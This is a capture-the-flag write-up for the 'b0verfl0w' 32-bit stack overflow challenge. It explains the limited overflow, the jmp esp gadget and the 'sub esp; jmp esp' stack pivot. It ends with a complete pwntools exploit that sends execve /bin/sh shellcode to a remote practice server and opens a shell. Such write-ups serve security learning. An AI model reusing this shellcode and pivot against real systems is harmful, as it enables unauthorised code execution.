x_ctf_b0verfl0w
step
-
Routine inspection, 32-bit program, RELRO is enabled (got table cannot be rewritten)
-
Try running the program locally to see the general situation
-
32-bit ida loading
fgets can overflow, but it can only overflow 0x32-0x20-0x4=14 bytes. Since nx is not enabled, the first thing that comes to mind is shellcode. 0x20 will definitely not fit into the shellcode generated by pwntools. You can only write by yourself, but We have to find a way to hijack esp to execute our shellcode -
The jump esp gadget is found in the hit function,
so we can construct such a stack
ret is written jump esp, after executing ret, esp+4 will point to sub esp, 0x28; jump esp, and then execute, esp will return Go to the location of the shellcode, then jump esp; the shellcode is executed.
For details on the changes of esp and eip after executing ret, see this article -
How to write shellcode refer to my previous article , I will directly post the exp here
from pwn import *
context.log_level='debug'
r=remote('node3.buuoj.cn',29554)
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
print len(shellcode) #21
jmp_esp=0x8048504
sub_esp_jmp=asm('sub esp,0x28;jmp esp')
payload=shellcode+(0x20-len(shellcode)+4)*'a'+p32(jmp_esp)+sub_esp_jmp
r.sendline(payload)
r.interactive()